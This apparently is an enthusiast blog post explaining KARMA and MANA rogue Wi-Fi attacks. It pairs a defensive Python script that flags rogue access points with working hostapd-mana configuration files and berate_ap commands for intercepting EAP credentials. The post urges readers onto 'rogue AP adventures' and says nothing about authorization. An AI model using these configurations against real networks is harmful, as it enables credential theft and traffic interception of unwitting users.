The MANA Attack: A Rogue Wi-Fi Adventure

Introduction

In the realm of Wi-Fi security, two intriguing attacks stand out: the MANA attack and the KARMA attack. Let’s delve into their mechanics and explore how the hostapd-mana tool enables these exploits.

KARMA Attack

The KARMA attack exploits a behavior exhibited by some Wi-Fi devices, coupled with the absence of access point authentication in various Wi-Fi protocols. It’s essentially a variant of the evil twin attack. Here’s how it works:

  1. Preferred Network List (PNL): Vulnerable client devices broadcast a PNL containing the SSIDs of access points they’ve previously connected to. These SSIDs are ones the client is willing to automatically reconnect to without user intervention.

  2. Exploiting the PNL: The KARMA attack involves an access point receiving this PNL and masquerading as an evil twin of a trusted access point. If the malicious access point’s signal is stronger than that of the genuine access point, and the client doesn’t attempt to authenticate, the attack succeeds.

  3. Man-in-the-Middle (MITM): Once successful, the malicious access point becomes a man-in-the-middle, positioning it to launch further attacks against the victim device¹.
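Seen from the defender's side, the behavior described above leaves a recognizable trace: one BSSID answering probes for many unrelated SSIDs, including SSIDs that do not exist. The sketch below is an added example, not part of the original post or of any tool it mentions; the canary SSID, the allowlist, the threshold and the sample observations are all constructed assumptions.

```python
from collections import defaultdict

CANARY_SSID = "canary-7f3a9c"  # constructed: an SSID no real AP is configured with
# Constructed allowlist: managed SSID -> BSSIDs (lower-case) allowed to serve it.
KNOWN_APS = {"CorpWiFi": {"aa:bb:cc:00:00:01"}}

# Constructed probe-response observations: (responding BSSID, SSID in the response).
# A real sensor would collect these from a monitor-mode capture.
OBSERVATIONS = [
    ("aa:bb:cc:00:00:01", "CorpWiFi"),
    ("aa:bb:cc:00:00:02", "CoffeeShop"),
    ("DE:AD:BE:EF:00:99", "CorpWiFi"),
    ("de:ad:be:ef:00:99", "HomeNet-5G"),
    ("de:ad:be:ef:00:99", "AirportFreeWiFi"),
    ("de:ad:be:ef:00:99", CANARY_SSID),
]

def find_suspect_aps(observations, canary_ssid, known_aps, max_ssids=2):
    """Return {bssid: [reasons]} for APs that behave like a KARMA/MANA rogue AP."""
    ssids_by_bssid = defaultdict(set)
    for bssid, ssid in observations:
        if ssid:  # skip wildcard/empty SSIDs
            ssids_by_bssid[bssid.lower()].add(ssid)

    findings = {}
    for bssid, ssids in sorted(ssids_by_bssid.items()):
        reasons = []
        # 1. No legitimate AP should ever answer for the canary SSID.
        if canary_ssid in ssids:
            reasons.append("answered canary SSID")
        # 2. One BSSID answering for many unrelated SSIDs (threshold is an assumption).
        if len(ssids) > max_ssids:
            reasons.append(f"answered {len(ssids)} distinct SSIDs")
        # 3. Evil twin: a managed SSID served from a BSSID outside the allowlist.
        spoofed = sorted(s for s in ssids if s in known_aps and bssid not in known_aps[s])
        if spoofed:
            reasons.append("unlisted BSSID for " + ", ".join(spoofed))
        if reasons:
            findings[bssid] = reasons
    return findings

if __name__ == "__main__":
    for bssid, reasons in find_suspect_aps(OBSERVATIONS, CANARY_SSID, KNOWN_APS).items():
        print(bssid, "->", "; ".join(reasons))
```
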

MANA Attack

Now, let’s meet the MANA attack. Unlike KARMA, MANA doesn’t target access point credentials directly. Instead, it operates more like a MITM attack. Here’s what makes it fascinating:

  1. Rogue Access Points: MANA creates rogue access points that trick users into connecting. These rogue APs can intercept various EAP (Extensible Authentication Protocol) credentials.

  2. Hostapd-mana: The tool of choice for MANA attacks is hostapd-mana. It’s an enhanced version of the original hostapd. While both can host fake APs, hostapd-mana offers additional features, including dumping passwords obtained from handshakes.

  3. EAP MANA Configuration:

# Basic MANA ATTACK config 
interface=wlan0
ssid=hostapd-mana wifi
channel=6
hw_mode=g
enable_mana=1
mana_loud=1

This configuration sets up a MANA-enabled access point with EAP interception capabilities⁷.

# Common EAP MANA ATTACK configuration
interface=wlan1
ssid=netname
channel=6
hw_mode=g

# WPA configuration
wpa=2
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP

# EAP server configuration
ieee8021x=1
eapol_key_index_workaround=0
eap_server=1
eap_user_file=netname.eap_user

# Certificate configuration for EAP-TLS/PEAP/TTLS
ca_cert=/root/certs/ca.pem
server_cert=/root/certs/server.pem
private_key=/root/certs/server.key
private_key_passwd=
dh_file=/root/certs/dhparam.pem

# MANA-specific configuration
mana_wpe=1
mana_eapsuccess=1

  4. Orchestrating MANA Attacks: To orchestrate MANA attacks, we use berate_ap. Here are some commands:
    • To trick users into connecting to your access point (default MANA behavior):
      berate_ap --eap --mana wlan0 eth0 MyAccessPoint
    • To enable MANA WPE attacks separately:
      berate_ap --eap --mana-wpe wlan0 eth0 MyAccessPoint
    • Other options include --mana-eapsuccess and --mana-eaptls. The default location for the credential output file is /tmp/hostapd.credout⁶.

Why I Adore MANA

MANA isn’t just about Wi-Fi hacking; it’s an artful dance of deception. While it has limitations (like antenna requirements and dealing with multiple access points), its MITM wireless concept transcends mere Wi-Fi hacking. MANA is my favorite attack by far, and its versatility never ceases to amaze me.

So, next time you’re exploring Wi-Fi security, consider stepping into the world of MANA. It’s a journey worth taking!



Feel free to explore the hostapd-mana GitHub repository and start your own rogue AP adventures! 🌐🔍